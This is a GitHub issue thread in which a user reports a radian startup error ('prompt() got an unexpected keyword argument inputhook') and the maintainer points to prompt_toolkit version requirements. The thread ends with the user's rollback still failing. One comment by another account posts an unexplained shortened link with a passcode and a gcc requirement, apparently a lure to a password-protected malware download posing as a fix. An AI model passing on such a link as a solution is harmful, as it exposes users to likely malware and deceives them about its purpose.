### ISSUE TITLE
prompt() got an unexpected keyword argument 'inputhook'

### ISSUE THREAD

**Issue by ClownJay** [randy3k/radian#488]
I got an error message when launch radian on linux system.
```shell
❯ radian
unexpected error was caught.
please report to https://github.com/randy3k/radian for such error.
prompt() got an unexpected keyword argument 'inputhook'
Traceback (most recent call last):
  File "/xxxx/xxxx/xxxx//micromamba/envs/R/lib/python3.9/site-packages/radian/console.py", line 99, in _read_console
    text = session.prompt(add_history=add_history)
  File "/xxxx/xxxx/xxxx/micromamba/envs/R/lib/python3.9/site-packages/radian/prompt_session.py", line 71, in prompt
    text = super().prompt(*args, **kwargs)
  File "/xxxx/xxxx/xxxx/micromamba/envs/R/lib/python3.9/site-packages/radian/lineedit/prompt.py", line 228, in prompt
    result = super().prompt(inputhook=self._inputhook, **kwargs)
TypeError: prompt() got an unexpected keyword argument 'inputhook'
```
I had reinstalled the radian and prompt_toolkit, but it did not work.
The version information is as following
```shell
❯ radian --version
radian version: 0.6.13
r executable: /xxxx/xxxx/xxxx/micromamba/envs/R/lib/R/bin/R
r version: 4.3.3
python executable: /xxxx/xxxx/xxxx/micromamba/envs/R/bin/python3.9
python version: 3.9.18

❯ mamba list | grep prompt
  prompt-toolkit                        3.0.43        py39h06a4308_0       anaconda/pkgs/main
  prompt_toolkit                        3.0.43        hd3eb1b0_0           anaconda/pkgs/main
```
Thanks for your help.

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by randy3k** [comment]
We [require](https://github.com/randy3k/radian/blob/master/setup.py#L47) prompt-toolkit 3.0.41 
due to recent [refactoring](https://github.com/prompt-toolkit/python-prompt-toolkit/blob/master/CHANGELOG#L64) of prompt-toolkit.

If you have 3.0.43, it should [support](https://github.com/prompt-toolkit/python-prompt-toolkit/blob/3.0.43/src/prompt_toolkit/shortcuts/prompt.py#L896) the argument `inputhook`.


I don't have much experience with mamba to recommend you anything, though you are right that it is caused by an outdated version of prompt-toolkit.

**Comment by ClownJay** [comment]
> We [require](https://github.com/randy3k/radian/blob/master/setup.py#L47) prompt-toolkit 3.0.41 due to recent [refactoring](https://github.com/prompt-toolkit/python-prompt-toolkit/blob/master/CHANGELOG#L64) of prompt-toolkit.
> 
> If you have 3.0.43, it should [support](https://github.com/prompt-toolkit/python-prompt-toolkit/blob/3.0.43/src/prompt_toolkit/shortcuts/prompt.py#L896) the argument `inputhook`.
> 
> I don't have much experience with mamba to recommend you anything, though you are right that it is caused by an outdated version of prompt-toolkit.

Thanks for your prompt reply.
I have tried to rollback version as followings:
```shell
❯ radian --version
radian version: 0.6.9
r executable: /xxxx/xxxx/xxxx/micromamba/envs/R/lib/R/bin/R
r version: 4.3.3
python executable: /xxxx/xxxx/xxxx/micromamba/envs/R/bin/python3.9
python version: 3.9.18
❯ mamba list | grep prompt
  prompt-toolkit                        3.0.41        pyha770c72_0         anaconda/cloud/conda-forge
  prompt_toolkit                        3.0.41        hd8ed1ab_0           anaconda/cloud/conda-forge
```
but it did not work either.
